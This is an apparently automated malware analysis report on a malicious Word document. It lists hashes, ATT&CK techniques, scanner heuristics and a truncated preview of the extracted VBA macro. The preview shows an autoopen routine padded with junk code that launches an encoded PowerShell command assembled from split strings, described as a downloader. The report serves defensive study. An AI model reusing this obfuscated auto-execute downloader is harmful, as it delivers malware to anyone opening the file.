Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 71dd9d4f7b07f04b…

MALICIOUS

Office (OLE)

Size: 207.9 KB
Created: 2019-03-13 13:15:00
Authoring application: Microsoft Office Word
First seen: 2019-10-01
MD5: 2f83bb776878951553ca9e88f7534761
SHA-1: 81727a2fb7ae05a957645d96cfc3242acfac80d3
SHA-256: 71dd9d4f7b07f04bf0394a425c77e6834a991529f0044ca34553bf37ebbb117c
Risk Score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. The macro utilizes obfuscation techniques, including splitting keywords to reassemble API names like 'Win32_Process', and uses GetObject to execute code. This indicates the macro's purpose is to download and execute a second-stage payload, a common technique for malware delivery.

Heuristics (8)

  • ClamAV: Doc.Downloader.00536d-6895734-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.00536d-6895734-0
  • VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals [critical] OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    Document contains an AutoOpen macro, which runs automatically when the document is opened.
  • GetObject call [high] OLE_VBA_GETOBJ
    Macro code contains a GetObject call.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 43966 bytes
SHA-256: ce238ff237be5acbd3bffe453cc78129356f902cb2ed24436c2d11e705da7dba

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "FXAB4CXw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function hUAAwB()
   If rBAADAA = UAAoDGAB Then
vcAGXQw = Chr(wAAADB)
oABXB_ = mAABADG + ChrW(zGUo__) * 840847694 * CBool(13688527) + 474000250 / Round(SADAU_kD) - RZ4AAD + Sqr(969985382) - 864222629 * CByte(361781859)
tokXBAA = Chr(IDXDcD)
End If
   If mZAxD4A = m41AAQG Then
QkoAQXA = Chr(HAUBAXUG)
HAADABA = t_D1GkQ + ChrW(QcQD1AQk) * 71652099 * CBool(886405306) + 257062441 / Round(wcXUAZA) - PAAAUAxA + Sqr(744307070) - 803808797 * CByte(779699605)
iCQAD1G = Chr(BAD_kDA)
End If
   If AAAXAwc = QBQD11A Then
OCGAQAX = Chr(TXAAAA)
pAA4k4A = dAAAUCC + ChrW(pABDUxk) * 26115350 * CBool(594482923) + 170981871 / Round(v4DCZUDA) - bAkAQZA + Sqr(984005377) - 258158391 * CByte(937426555)
TwZAAo = Chr(AcQQGA)
End If
   If lAA1ZB = V1x_4oxG Then
fUA_cUw = Chr(tABADk)
hAkCDQB = woAxAA + ChrW(wDAAA_A) * 869050044 * CBool(804211230) + 94536589 / Round(wGDAUDA) - MAABCUD + Sqr(192750319) - 34608862 * CByte(435658901)
tDQAX1_ = Chr(cUG1D1)
End If
   If fAAA_oU = LUAkAw Then
wAABDDZ = Chr(FAQBAxBA)
kDAckw_ = zxAQwDB + ChrW(ZZCGxAQk) * 268422185 * CBool(438852457) + 389059966 / Round(jCGBQoC) - jAoAUB_ + Sqr(320492789) - 758102058 * CByte(249117522)
w14xA1w = Chr(BACUAAkU)
End If
   If UDG1XDAZ = LAUAAUAG Then
lAGADAZ = Chr(QQACZoA)
OwAQA1 = CADADAB + ChrW(DABCAo) * 168539386 * CBool(97910033) + 712115013 / Round(QA1_A4) - EwADAA + Sqr(207592537) - 174361722 * CByte(73248147)
jDAZAD = Chr(SDAABD)
End If
   If vkDZxGA = PBAQAQBG Then
KwcADUw = Chr(EGDAAc)
EcD_XA1Q = MABwGDG + ChrW(zDAkQDB) * 744836428 * CBool(245276904) + 192014635 / Round(oABZUBAc) - cBACAQoc + Sqr(733965625) - 762902059 * CByte(303222300)
sDoBUDA = Chr(Go_AUA)
End If
   If TBAAGUAG = McXCQX4 Then
QkAocQA4 = Chr(vADGQAw)
GUQAAQA = coo_UXZ + ChrW(wXoCAw) * 187664420 * CBool(210890131) + 748791201 / Round(hU1AXo) - qQDBDDA + Sqr(50165881) - 615361918 * CByte(434617790)
HQCAUB = Chr(bAAQADx)
End If
End Function
Sub autoopen()
On Error Resume Next
   If r4wDXCC = zAUUCcAA Then
jAABAZ = Chr(vAxGUAGC)
hAD1w1c = rcDDDZAC + ChrW(nQo_AxUQ) * 331273200 * CBool(27273003) + 452637665 / Round(zBDABU) - tCZAABAC + Sqr(150328992) - 350283579 * CByte(333514268)
MAQ_AA = Chr(h_QDcDw)
End If
   If KCDA4Z = occAAADU Then
fUAAAkGC = Chr(lDcZAA)
KZABAAA1 = OUA_B4 + ChrW(HxkCDAAx) * 233039044 * CBool(669821698) + 981870913 / Round(fADXUDx) - WQAQGAUA + Sqr(539781038) - 389743467 * CByte(852176396)
U4AAXC = Chr(D1BGGQBA)
End If
   If VAAGDUQX = tAQAoAU Then
bAAABQGQ = Chr(UG1U_DA_)
BAcAcAA = wZAAQA + ChrW(wAoGoQA) * 48060244 * CBool(839004474) + 581674388 / Round(zAXUZo) - VAACAAA + Sqr(254128243) - 481508475 * CByte(598742438)
HxG1ACAD = Chr(IABXAGA)
End If
SU4DGABo (McCkACwA + "po" + dwAZAC + "wersh" + vBAAABGZ + "ell -e " + TA1AAQ + uBUUADx + XokDBA + PAAACQ + CAxBkBB + zQACAUZ)
   If zXkQDAZU = mCBcACA Then
Y_UoAkD1 = Chr(icAACwA)
O1AxQQB = aABkUA + ChrW(O1wGcA) * 295804366 * CBool(271502775) + 144036889 / Round(ooQwAADB) - zDABDQQ + Sqr(848151534) - 527374704 * CByte(597147512)
hCADA1G = Chr(jcBQkAwC)
End If
   If q1wxQk1A = aAUAGZwo Then
ikBA1UU_ = Chr(VZABCA)
iDA_C_A = QGDA1AZ + ChrW(XoUAAAAU) * 549579165 * CBool(997995911) + 480272976 / Round(LcAX1DXA) - KADAAZk + Sqr(476233654) - 922639560 * CByte(268984209)
hAZAAAAA = Chr(nQAUxDQ)
End If
   If nDQAk_wk = l1U41Akk Then
ICGAco = Chr(JZAADxBX)
HxQAAQ1A = wAAkAAQ + ChrW(pDwAACA) * 624836757 * CBool(406814430) + 213276037 / Round(FAUcQZ) - G_AZAAB + Sqr(69436041) - 21137613 * CByte(425364)
oA4DABA = Chr(voUUAocA)
End If
End Sub
Function EDZDAcD()
   If CAXGcxx = m44QUXAA Then
nAUAA_ = Chr(IZAAUxAc)
oGAXxcGQ = GAAxAAA + ChrW(YBX4XBA) * 900071554 * CBool(598844070) + 198325339 / Round(UGAx_A) - VZBcUGQ + Sqr(756088232) - 897006791 * CByte(982120095)
PDAXBA = Chr(ODA4oQ)
End If
   If RGx
... (truncated)